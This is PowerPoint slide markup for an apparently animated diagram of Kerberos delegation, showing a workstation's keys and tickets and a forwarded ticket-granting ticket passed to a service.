            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="136" name="Rectangle 135"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3111530" y="3857261"/>
                  <a:ext cx="2500581" cy="194800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spcAft>
                      <a:spcPts val="1500"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="137" name="TextBox 136"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3692408" y="4173468"/>
                  <a:ext cx="1671680" cy="1426031"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr>
                    <a:spcAft>
                      <a:spcPts val="2200"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t>Ticket Information</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr>
                    <a:spcAft>
                      <a:spcPts val="2200"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                    <a:t>Forwarded</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t> TGT Session Key</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr>
                    <a:spcAft>
                      <a:spcPts val="2200"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                    <a:t>Forwarded</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t> TGT</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="135" name="Picture 134"/>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194617" y="3957926"/>
                <a:ext cx="351058" cy="573771"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="78" name="Picture 7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208037" y="2870607"/>
              <a:ext cx="389339" cy="384591"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="79" name="Picture 7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84028" y="3492728"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Right Arrow 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3490693" y="3555690"/>
              <a:ext cx="143276" cy="170966"/>
            </a:xfrm>
            <a:prstGeom prst="right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de-DE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="228" name="Curved Connector 227"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4211961" y="4153218"/>
            <a:ext cx="1550841" cy="746156"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100086"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6046737" y="3711304"/>
            <a:ext cx="2247679" cy="2346131"/>
            <a:chOff x="6046737" y="3711304"/>
            <a:chExt cx="2247679" cy="2346131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="223" name="Picture 222"/>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046737" y="3711304"/>
              <a:ext cx="2247679" cy="2346131"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:glow rad="1041400">
                <a:schemeClr val="bg1"/>
              </a:glow>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="224" name="Picture 22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401938" y="4023266"/>
              <a:ext cx="190699" cy="377609"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="225" name="TextBox 224"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6644102" y="4080827"/>
              <a:ext cx="1468864" cy="625812"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="2000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>Ticket Information</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="2000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="TextBox 225"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6636381" y="5182177"/>
              <a:ext cx="1468864" cy="625812"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="2000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="2000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>User Credentials</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="227" name="Picture 22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6334643" y="5565767"/>
              <a:ext cx="225134" cy="308918"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="222" name="Picture 22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156566" y="3876010"/>
              <a:ext cx="190335" cy="279699"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="229" name="Picture 22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312498" y="4442629"/>
              <a:ext cx="319542" cy="319542"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="231" name="Picture 230"/>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299661" y="5132770"/>
              <a:ext cx="319542" cy="319542"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="234" name="Picture 233"/>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153514" y="4965720"/>
              <a:ext cx="185616" cy="272766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="203769" y="1124744"/>
            <a:ext cx="2745305" cy="3312979"/>
            <a:chOff x="203769" y="1124744"/>
            <a:chExt cx="2745305" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Workstation compressed"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="203769" y="1124744"/>
              <a:ext cx="2745305" cy="3312979"/>
              <a:chOff x="203769" y="1124744"/>
              <a:chExt cx="2745305" cy="3312979"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="119" name="Picture 11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48390" y="1275402"/>
                <a:ext cx="2700684" cy="3162321"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="117" name="Picture 11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38254" y="2163801"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="118" name="Picture 11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86486" y="2543842"/>
                <a:ext cx="348452" cy="348452"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="107" name="Group 106"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="203769" y="1124744"/>
                <a:ext cx="2685437" cy="665914"/>
                <a:chOff x="2925296" y="1597991"/>
                <a:chExt cx="2685437" cy="665914"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="108" name="TextBox 107"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3042792" y="1832275"/>
                  <a:ext cx="2567940" cy="215444"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr"/>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t>Workstation</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="109" name="TextBox 108"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3042793" y="2079239"/>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110" name="Picture 10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925296" y="1597991"/>
                  <a:ext cx="566691" cy="526075"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="100" name="Picture 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1863" y="1837232"/>
                <a:ext cx="327713" cy="327713"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="TextBox 100"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="918031" y="1900853"/>
                <a:ext cx="1789823" cy="2323713"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>User Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Service Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Service Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Forwarded TGT Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Forwarded TGT</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="105" name="Picture 10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52381" y="2889963"/>
                <a:ext cx="475522" cy="315018"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="190" name="Picture 18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40803" y="3942969"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="191" name="Right Arrow 190"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="747468" y="4005931"/>
                <a:ext cx="143276" cy="170966"/>
              </a:xfrm>
              <a:prstGeom prst="right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de-DE" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="236" name="Picture 235"/>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457018" y="3187702"/>
              <a:ext cx="362558" cy="362558"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 1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61668" y="3536201"/>
              <a:ext cx="368214" cy="368214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33196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166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="166"/>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right)">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28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="228"/>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1.94444E-6 -7.40741E-7 L -0.29879 0.00255 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-14948" y="116"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="228"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="22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par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>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80"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="180"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.44444E-6 -4.07407E-6 L 0.6198 -0.53935 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="30990" y="-26968"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="50" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52"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7. Kerberos Application Request with forwarded TGT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Workstation compressed"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="203769" y="1124744"/>
            <a:ext cx="2745305" cy="3312979"/>
            <a:chOff x="203769" y="1124744"/>
            <a:chExt cx="2745305" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="119" name="Picture 1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390" y="1275402"/>
              <a:ext cx="2700684" cy="3162321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="117" name="Picture 1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254" y="2163801"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="118" name="Picture 1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6486" y="2543842"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="107" name="Group 106"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="203769" y="1124744"/>
              <a:ext cx="2685437" cy="665914"/>
              <a:chOff x="2925296" y="1597991"/>
              <a:chExt cx="2685437" cy="665914"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="108" name="TextBox 107"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042792" y="1832275"/>
                <a:ext cx="2567940" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Workstation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="109" name="TextBox 108"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042793" y="2079239"/>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110" name="Picture 10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25296" y="1597991"/>
                <a:ext cx="566691" cy="526075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="100" name="Picture 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1863" y="1837232"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="TextBox 100"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="918031" y="1900853"/>
              <a:ext cx="1789823" cy="2323713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
